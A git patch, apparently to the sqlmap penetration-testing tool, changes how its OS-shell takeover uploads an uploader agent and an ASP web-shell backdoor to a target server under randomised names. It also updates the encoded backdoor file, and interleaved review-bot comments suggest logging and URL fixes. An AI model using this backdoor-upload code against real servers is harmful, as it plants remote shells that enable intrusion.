From 2cafd5697b7a5c7d86956284b9d97f772679a5de Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 25 Feb 2010 10:33:41 +0000
Subject: [PATCH] new changes regarding --os-shell
---
 lib/takeover/web.py | 14 ++++++++------
 shell/backdoor.asp_ | Bin 433 -> 427 bytes
 2 files changed, 8 insertions(+), 6 deletions(-)
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index e9221d0a3..0512b772e 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -36,6 +36,7 @@ from lib.core.common import ntToPosixSlashes
 from lib.core.common import isWindowsPath
 from lib.core.common import normalizePath
 from lib.core.common import posixToNtSlashes
+from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.convert import hexencode
 from lib.core.data import conf
@@ -166,12 +167,12 @@ class Web:
 elif int(choice) < 1 or int(choice) > 3:
 logger.warn("invalid value, it must be 1 or 3")
- backdoorName = "backdoor.%s" % self.webApi
- backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_'), backdoorName)
+ backdoorName = "tmpb%s.%s" % (randomStr(4), self.webApi)
+ backdoorStream = decloakToNamedTemporaryFile(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi), backdoorName)
 backdoorContent = backdoorStream.read()
- uploaderName = "uploader.%s" % self.webApi
- uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))
+ uploaderName = "tmpu%s.%s" % (randomStr(4), self.webApi)
+ uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "uploader.%s_" % self.webApi))
 for directory in directories:
 # Upload the uploader agent
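Review bot: The deployed names in the `@@ -166,12 +167,12 @@` hunk are now random (`"tmpb%s.%s" % (randomStr(4), self.webApi)` and its `tmpu` counterpart), yet nothing visible here records the backdoor's name, so after a test there is no reliable list of files to remove from the target and a leftover backdoor stays exposed. The later `@@ -194,7 +196,7 @@` hunk logs only the uploader URL; I would log the backdoor path the same way once it is written, e.g. `logger.info("backdoor uploaded as '%s'" % backdoorName)`. A one-line comment such as `# template on disk keeps its fixed name; only the deployed name is randomized` would also explain why the template path is now spelled out as a format string. The loop that starts at `for directory in directories:` continues outside the hunk, so the backdoor upload itself may already report the name there.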
@@ -181,8 +182,9 @@ class Web: if isWindowsPath(requestDir): requestDir = requestDir[2:] requestDir = normalizePath(requestDir) + self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir) - self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName) + self.webUploaderUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), uploaderName) self.webUploaderUrl = ntToPosixSlashes(self.webUploaderUrl.replace("./", "/")) uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, raise404=False) @@ -194,7 +196,7 @@ class Web: continue infoMsg = "the uploader agent has been successfully uploaded " - infoMsg += "on '%s'" % directory + infoMsg += "on '%s' ('%s')" % (directory, self.webUploaderUrl) logger.info(infoMsg) if self.webApi == "asp": diff --git a/shell/backdoor.asp_ b/shell/backdoor.asp_ index fe42624c9c4cc1af1a8da2a4b5c4242d1c67e291..4874c6039e1cf654de6bab54e89dee8c3f43a16f 100644 GIT binary patch delta 416 zcmV;R0bl;H1FHiLJtY@LPCh1CEGCOvurZMi7k_LXq%v|a)pAW4k&`k@bD9?xpk;k3 zLQ88Ke;a^bRBx-ugXR2~CtT2R+C{C)8^%Ll0ap1U6y6aeOhXP*nGNKDN zVs;`BCLeE{qJp|Mi=Zbetw42w#DharH)ro&rKMggZr4Z6Q@FeEQ%Sv4b4Tr9K33XX zc-v)@JW`4a2iZr`Kzs?p8@LZVe*jMT!hcZ8WvS4}rbHU;a%BwbTNwU~;SF|r$IM0E zA19KQ-ZE*Wn9|@KBrY~VB3LTAX8*j*eO1mOb@IXrIrJM=fDJ9l+$F__F*;()LGA_>WB K;XOT5lEFun_`Q7q delta 422 zcmV;X0a^a51F-`RJtY@LPCh1CEGEN)qrj047k{%$T3w!_6#=Rqqe@xG7NTT4JHT04 zZK0I(r=plknWV_geN7wCPn#@uK3mB^EYuoul-e^ta5vGQ1&yLCo6Vz$J}lxDR~aUQ z)~U#|=Ot_tH0C7LWDYS)m9z4K(MI2kclhhJSMhdq;1qTy=ukC+MakN415WD(YDW0CB?R zY-Q!(Voy&}GdVC;9!$M6)`&^V7CJabHkR3{)nPRRE3M=_X-aK7oEXe+jfL}3d%c7* zkW~jCyXo#}%`uj8oQnG;j7l_TE3-`Dcw62Pg3!%lq`^jG$NtLXL~Pz}Z&$7P%n!%m Q4^R7O4LV0Jki&zcz~X_&cmMzZ
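Review bot: The `rstrip('/')` added in the `@@ -181,8 +182,9 @@` hunk removes the doubled slash only from `self.webUploaderUrl`; `self.webBaseUrl` still ends with whatever `requestDir` ends with, so any other URL built from it later (outside this hunk) can still contain `//`. Stripping once where the base is assigned keeps every derived URL consistent: `self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir.rstrip('/'))`. The enclosing loop body starts before and ends after the hunk, so whether other code depends on the trailing slash should be checked first.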